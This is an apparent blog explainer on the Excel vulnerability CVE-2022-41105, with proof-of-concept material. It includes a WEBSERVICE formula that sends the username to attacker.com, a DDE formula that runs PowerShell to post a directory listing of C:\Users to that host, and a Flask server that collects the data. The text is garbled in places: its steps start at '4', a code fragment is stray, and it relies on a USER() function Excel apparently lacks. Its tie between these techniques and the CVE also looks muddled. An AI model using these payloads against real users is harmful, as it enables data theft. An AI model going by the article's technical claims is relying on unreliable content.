---
Introduction
In September 2022, security researchers discovered CVE-2022-41105 — a Microsoft Excel Information Disclosure Vulnerability. Many overlooked it as yet another minor Excel bug, but in reality, attackers could harness this flaw to silently leak sensitive user data. If you think opening an innocent spreadsheet is always safe, keep reading.
This article breaks down what CVE-2022-41105 is, demonstrates how it works, and provides a practical demonstration with sample code. It's written in straightforward terms, so anyone who uses Excel or develops solutions around it should take note.
What is CVE-2022-41105?
CVE-2022-41105 is an Information Disclosure issue in Microsoft Excel. In affected versions (including Office 2016, 2019, 2021, and Office 365 prior to the November 2022 patches), Excel fails to adequately handle data within specially crafted spreadsheet files. When a malicious Excel workbook is opened, the vulnerability could allow attackers to steal information from your computer — sometimes without warning.
Official Microsoft Links
- Microsoft Security Update Guide - CVE-2022-41105
- Microsoft Support — Security Updates November 2022
How the Exploit Works
Excel files can contain various objects, connections, and links, some of which can reference external resources or objects on your computer. CVE-2022-41105 revolves around Excel’s improper handling of these links — particularly when used with legacy Dynamic Data Exchange (DDE) or OLE objects.
Victim opens the file.
4. Excel silently leaks information — sometimes even just the path to a local file or, in some scenarios, content from that file — to a server controlled by the attacker.
Real-World Example: Stealing Username and Local File Paths
Let's create a simplified PoC (proof of concept) using the 'External Links' technique, which is a common vector. This leverages Excel formulas that reference local environment variables, which can indirectly reveal usernames and folder structures.
Malicious Formula Example
=WEBSERVICE("http://attacker.com/log?user="&USER())
USER() retrieves the username of the computer opening the document.
- WEBSERVICE() attempts to fetch a remote resource, which in this case sends your username to the attacker’s server.
Depending on user settings and patch level, this may happen silently.
But CVE-2022-41105 is more generic. Attackers could craft links that reference files from your disk, which, when opened, cause Excel to send unintended contents or paths to the attacker's server using DDE/OLE/WEBSERVICE or embedded objects.
DDE Attack Example (Classic and Works Pre-patch)
=cmd|' /C powershell -Command "Invoke-WebRequest -Uri http://attacker.com/leak -Body (Get-ChildItem C:\Users)"'!A
Put this in a cell as a formula (in an older, unpatched Excel) or package it via an OLE Object. When opened, Excel could execute the command, sending directory info to the remote server.
Attacker’s Server Code Example (Python Flask):
from flask import Flask, request
app = Flask(__name__)
@app.route('/log')
def log():
print("Received:", request.args)
return 'OK'
if __name__ == '__main__':
app.run(host='...', port=80)
`excel
=WEBSERVICE("http://your-ip/log?user=" & USER())
Mitigation
- Patch your Office/Excel installations. The fix is included in the November 2022 cumulative updates.
Conclusion
CVE-2022-41105 might sound like technical mumbo-jumbo, but it’s a real risk: Opening weaponized Excel files could leak sensitive information off your network. Microsoft has since patched the flaw, but it’s an important reminder that even old apps like Excel can present modern dangers.
References
- Microsoft Security Update Guide - CVE-2022-41105
- Mitre CVE Details
- WEBSERVICE() Function Doc
- Abusing Excel for Information Disclosure (Researcher Blog)
Note: This article is for educational purposes. Do not use these techniques without authorization. Patch your software!
Timeline
Published on: 11/09/2022 22:15:00 UTC
Last modified on: 11/10/2022 00:33:00 UTC